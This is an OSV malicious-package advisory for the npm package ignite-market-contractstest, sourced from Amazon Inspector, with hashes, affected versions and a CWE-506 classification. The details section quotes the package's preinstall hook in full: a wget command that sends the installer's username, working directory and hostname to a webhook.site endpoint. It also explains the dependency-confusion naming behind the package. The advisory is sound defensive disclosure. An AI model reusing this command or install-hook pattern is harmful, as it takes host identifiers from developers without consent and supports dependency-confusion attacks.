MAL-2026-4583

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ignite-market-contractstest/MAL-2026-4583.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-4583

Published

2026-05-22T00:13:31Z

Modified

2026-05-26T06:02:37.197998228Z

Summary

Malicious code in ignite-market-contractstest (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (b9babd9b088785649368dbf885050b6a15b218a6b38d2dcd058f0c9eda5109da)

package.json declares a preinstall lifecycle hook that runs wget --quiet "https://webhook.site/64063d25-fcd3-44e5-a454-34845bc63250/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)". On every npm install, this exfiltrates the installer's username, current working directory, and hostname to a third-party request-logging endpoint controlled by the package author, without consent. The package metadata is placeholder (author 'me', empty description, version 0.0.9), the name ignite-market-contractstest is shaped like a dependency-confusion target against an internal ignite-market-contracts package, and it depends on seaport-core-16 — a similarly suspicious name in the OpenSea seaport namespace. The combination of unconsented host-identifier exfiltration on install, dependency-confusion-shaped naming, and placeholder metadata is the canonical reconnaissance shape used to validate that an internal package name is reachable on the public registry.

Database specific

{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-05-22T00:13:36Z",
            "versions": [
                "0.0.9"
            ],
            "sha256": "b9babd9b088785649368dbf885050b6a15b218a6b38d2dcd058f0c9eda5109da",
            "id": "IN-MAL-2026-004099",
            "source": "amazon-inspector",
            "import_time": "2026-05-26T05:51:56.202874273Z"
        },
        {
            "import_time": "2026-05-26T05:51:56.11193869Z",
            "versions": [
                "9.0.0"
            ],
            "sha256": "ba1152fed442631b3d367dc51ba9b70ee92938e4a53f3152480cbf46df403a3e",
            "id": "IN-MAL-2026-004098",
            "source": "amazon-inspector",
            "modified_time": "2026-05-22T00:13:31Z"
        }
    ]
}

References

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com

Affected packages

npm / ignite-market-contractstest

Package

Name: ignite-market-contractstest; View open source insights on deps.dev
Purl: pkg:npm/ignite-market-contractstest

Affected ranges

Affected versions

0.*

0.0.9

9.*

9.0.0

Database specific

indicators

{
    "evidence_files": [
        {
            "sha256": "393d749206f15c50826b3a2eede2784461e8439f27f8ccb68ef93680d1abf9eb",
            "tlsh": "bcf07d79a630ea1b1ac64f500820929ff671fa0b94412e0dde7323dd818e9db2439458",
            "path": "package.json"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-UNpm2Dd4TyjHUomdqO/GVr+Rm8MLsdXBH3maSxkqn4XiXJKtm0+0229MAlxP6xvuAWsR/VDlb2ZXv39qHQUAIA==",
                "sha1": "f0529593349956ac8610d3c2c4e79c90263f2b61"
            },
            "filename": "ignite-market-contractstest-0.0.9.tgz"
        }
    ]
}

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/ignite-market-contractstest/MAL-2026-4583.json"